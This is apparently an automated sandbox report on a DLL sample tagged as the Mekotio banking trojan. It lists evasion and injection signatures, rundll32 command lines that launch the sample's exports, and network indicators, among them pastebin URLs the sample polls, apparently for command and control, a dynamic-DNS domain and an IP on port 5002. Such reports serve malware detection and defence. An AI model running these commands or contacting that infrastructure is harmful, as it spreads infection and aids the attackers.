Edit tour

Windows Analysis Report
5.dll

Overview

General Information

Sample name:	5.dll
Analysis ID:	1524659
MD5:	a1d3922228fcfb9b734d3d92213cf525
SHA1:	21834950d507117c0c9d9e4c42c76c1e5f41b61c
SHA256:	b84bad0674108e09eb3c974e8ffbaf901e69ca2939dfe70527fb369fe2df831e
Tags:	dllMekotiouser-Merlax_
Infos:

Detection

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

System process connects to network (likely due to code injection or exploit)

AI detected suspicious sample

Connects to a pastebin service (likely for C&C)

Hides threads from debuggers

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

PE file contains section with special chars

Switches to a custom stack to bypass stack traces

Tries to evade analysis by execution special instruction (VM detection)

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality to query the security center for anti-virus and firewall products

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 7280 cmdline: loaddll32.exe "C:\Users\user\Desktop\5.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)

conhost.exe (PID: 7312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7380 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\5.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

rundll32.exe (PID: 7432 cmdline: rundll32.exe "C:\Users\user\Desktop\5.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)

WerFault.exe (PID: 2832 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7432 -s 704 MD5: C31336C1EFC2CCB44B4326EA793040F2)

rundll32.exe (PID: 7396 cmdline: rundll32.exe C:\Users\user\Desktop\5.dll,TMethodImplementationIntercept MD5: 889B99C52A60DD49227C5E485A016679)

WerFault.exe (PID: 5548 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7396 -s 696 MD5: C31336C1EFC2CCB44B4326EA793040F2)

rundll32.exe (PID: 7500 cmdline: rundll32.exe C:\Users\user\Desktop\5.dll,__dbk_fcall_wrapper MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 7540 cmdline: rundll32.exe C:\Users\user\Desktop\5.dll,azo06olt3gs7uifwf18b8 MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 7972 cmdline: rundll32.exe "C:\Users\user\Desktop\5.dll",TMethodImplementationIntercept MD5: 889B99C52A60DD49227C5E485A016679)

WerFault.exe (PID: 5288 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7972 -s 712 MD5: C31336C1EFC2CCB44B4326EA793040F2)

rundll32.exe (PID: 7980 cmdline: rundll32.exe "C:\Users\user\Desktop\5.dll",__dbk_fcall_wrapper MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 7992 cmdline: rundll32.exe "C:\Users\user\Desktop\5.dll",azo06olt3gs7uifwf18b8 MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 8004 cmdline: rundll32.exe "C:\Users\user\Desktop\5.dll",dbkFCallWrapperAddr MD5: 889B99C52A60DD49227C5E485A016679)

WerFault.exe (PID: 4688 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8004 -s 696 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Configuration

⊘No configs have been found

Yara Signatures

⊘No yara matches

Sigma Signatures

⊘No Sigma rule has matched

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 5.dll

Avira: detected

Multi AV Scanner detection for submitted file

Source: 5.dll	ReversingLabs: Detection: 34%
Source: 5.dll	Virustotal: Detection: 36%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.5% probability

Source: 5.dll

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, DLL, BYTES_REVERSED_HI

Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49764 version: TLS 1.2

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 104.20.3.235 443			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 208.109.246.134 5002			Jump to behavior

Connects to a pastebin service (likely for C&C)

Source: unknown

DNS query: name: pastebin.com

Source: global traffic

TCP traffic: 192.168.2.10:49722 -> 208.109.246.134:5002

Source: Joe Sandbox View	IP Address: 104.20.3.235 104.20.3.235
Source: Joe Sandbox View	IP Address: 104.20.3.235 104.20.3.235

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: global traffic	HTTP traffic detected: GET /raw/ZELZp1Yr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/ZELZp1Yr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/ZELZp1Yr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/hQqNRrQt HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/ZELZp1Yr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/ZELZp1Yr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/hQqNRrQt HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/ZELZp1Yr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/ZELZp1Yr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/ZELZp1Yr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/ZELZp1Yr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/hQqNRrQt HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/ZELZp1Yr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/ZELZp1Yr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/ZELZp1Yr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/ZELZp1Yr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/hQqNRrQt HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/ZELZp1Yr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/ZELZp1Yr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/ZELZp1Yr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/ZELZp1Yr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/hQqNRrQt HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/ZELZp1Yr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/ZELZp1Yr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/ZELZp1Yr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/ZELZp1Yr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/hQqNRrQt HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/ZELZp1Yr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/ZELZp1Yr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/ZELZp1Yr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/ZELZp1Yr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/hQqNRrQt HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/ZELZp1Yr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/ZELZp1Yr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/ZELZp1Yr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /raw/ZELZp1Yr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/ZELZp1Yr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/ZELZp1Yr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/hQqNRrQt HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/ZELZp1Yr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/ZELZp1Yr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/hQqNRrQt HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/ZELZp1Yr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/ZELZp1Yr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/ZELZp1Yr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/ZELZp1Yr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/hQqNRrQt HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/ZELZp1Yr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/ZELZp1Yr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/ZELZp1Yr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/ZELZp1Yr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/hQqNRrQt HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/ZELZp1Yr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/ZELZp1Yr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/ZELZp1Yr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/ZELZp1Yr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/hQqNRrQt HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/ZELZp1Yr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/ZELZp1Yr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/ZELZp1Yr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/ZELZp1Yr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/hQqNRrQt HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/ZELZp1Yr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/ZELZp1Yr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/ZELZp1Yr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/ZELZp1Yr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/hQqNRrQt HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/ZELZp1Yr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/ZELZp1Yr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/ZELZp1Yr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com

Source: global traffic	DNS traffic detected: DNS query: setember2024inf2.is-a-nurse.com
Source: global traffic	DNS traffic detected: DNS query: pastebin.com

Source: rundll32.exe, 0000000A.00000002.3072215647.00000000049C1000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000B.00000002.2944562994.0000000004BD1000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000D.00000002.3748461723.0000000004351000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 00000012.00000002.3038519715.0000000004801000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 00000015.00000002.3044055558.0000000004931000.00000020.00000001.01000000.00000004.sdmp, 5.dll	String found in binary or memory: http://csrc.nist.gov/publications/drafts/800-67-rev1/SP-800-67-rev1-2_July-2011.pdfS
Source: rundll32.exe, 0000000A.00000002.3072215647.00000000049C1000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000B.00000002.2944562994.0000000004BD1000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000D.00000002.3748461723.0000000004351000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 00000012.00000002.3038519715.0000000004801000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 00000015.00000002.3044055558.0000000004931000.00000020.00000001.01000000.00000004.sdmp, 5.dll	String found in binary or memory: http://csrc.nist.gov/publications/drafts/fips180-4/Draft-FIPS180-4_Feb2011.pdfU
Source: rundll32.exe, 0000000A.00000002.3072215647.00000000049C1000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000B.00000002.2944562994.0000000004BD1000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000D.00000002.3748461723.0000000004351000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 00000012.00000002.3038519715.0000000004801000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 00000015.00000002.3044055558.0000000004931000.00000020.00000001.01000000.00000004.sdmp, 5.dll	String found in binary or memory: http://csrc.nist.gov/publications/fips/fips46-3/fips46-3.pdfS
Source: 5.dll	String found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf
Source: rundll32.exe, 0000000A.00000002.3072215647.00000000049C1000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000B.00000002.2944562994.0000000004BD1000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000D.00000002.3748461723.0000000004351000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 00000012.00000002.3038519715.0000000004801000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 00000015.00000002.3044055558.0000000004931000.00000020.00000001.01000000.00000004.sdmp, 5.dll	String found in binary or memory: http://tools.ietf.org/html/rfc1321
Source: rundll32.exe, 0000000A.00000002.3072215647.00000000049C1000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000B.00000002.2944562994.0000000004BD1000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000D.00000002.3748461723.0000000004351000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 00000012.00000002.3038519715.0000000004801000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 00000015.00000002.3044055558.0000000004931000.00000020.00000001.01000000.00000004.sdmp, 5.dll	String found in binary or memory: http://tools.ietf.org/html/rfc4648S
Source: Amcache.hve.25.dr	String found in binary or memory: http://upx.sf.net
Source: 5.dll	String found in binary or memory: http://www.componentace.com
Source: rundll32.exe, 0000000A.00000002.3072215647.00000000049C1000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000B.00000002.2944562994.0000000004BD1000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000D.00000002.3748461723.0000000004351000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 00000012.00000002.3038519715.0000000004801000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 00000015.00000002.3044055558.0000000004931000.00000020.00000001.01000000.00000004.sdmp, 5.dll	String found in binary or memory: http://www.csrc.nist.gov/publications/fips/fips197/fips-197.pdfS
Source: rundll32.exe, 0000000A.00000002.3072215647.00000000049C1000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000B.00000002.2944562994.0000000004BD1000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000D.00000002.3748461723.0000000004351000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 00000012.00000002.3038519715.0000000004801000.00000020.00000001.01000000.00000004.sdmp, rundll32.exe, 00000015.00000002.3044055558.0000000004931000.00000020.00000001.01000000.00000004.sdmp, 5.dll	String found in binary or memory: http://www.ietf.org/rfc/rfc3447.txtS
